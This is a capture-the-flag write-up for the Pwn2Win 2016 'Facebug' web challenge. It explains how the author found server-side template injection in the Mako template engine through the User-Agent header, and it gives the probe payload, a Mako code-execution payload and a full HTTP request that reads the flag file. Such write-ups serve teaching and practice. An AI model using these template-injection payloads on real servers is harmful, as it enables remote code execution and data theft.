Pwn2Win CTF 2016 Facebug Writeup

Homepage:

https://pwn2win.party/

Description:

Below you can find my solution for Facebug task from Pwn2Win CTF 2016.

Proof of Concept:

We get simple page with register and login functionality.

After login, on /profile subpage we can see our login and User Agent.

We try several SQL Injection and XSS attacks, but no luck.

So maybe User Agent ?

After login with <script> as User Agent on page we notice:

<div class="media-body">
	<h5 class="media-heading"><strong>Security alert!</strong></h5>
	<p class="small text-muted"><i class="fa fa-clock-o"></i> 2016-03-26 15:10:11 GMT</p>
	<p>Suspicious activity detected. Alert sent to registered email.</p>
</div>

And indeed we get email message:

Suspecious login from: %our_ip% - <script>

So maybe XSS there? Again no luck.

But User Agent seems to be good way to pwn this.

Maybe Server-Side Template Injection ?

Wy try: {{ 7*7 }} and get 49 in response.

After several minutes and different payloads we know its Mako Templates for Python.

It’s quite easy to exploit:

<%
import os
x=os.popen('id').read()
%>
${x}

So final solution is:

POST /login HTTP/1.1
Host: facebug.pwn2win.party:8080
Content-Length: 43
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml
Origin: http://facebug.pwn2win.party:8080/register
User-Agent: aaaa <% x=__import__('os').popen('cat flag').read() %> ${x} vv
Content-Type: application/x-www-form-urlencoded
Referer: http://facebug.pwn2win.party:8080/register
Accept-Encoding: gzip, deflate
Accept-Language: pl-PL,pl;q=0.8,en-US;q=0.6,en;q=0.4
Connection: close

[email protected]&password=your_pass

And we get email with flag: CTF-BR{Rc3_1N_T3mpL4te_InJect10n_R0CKs_4_L0T}

Timeline: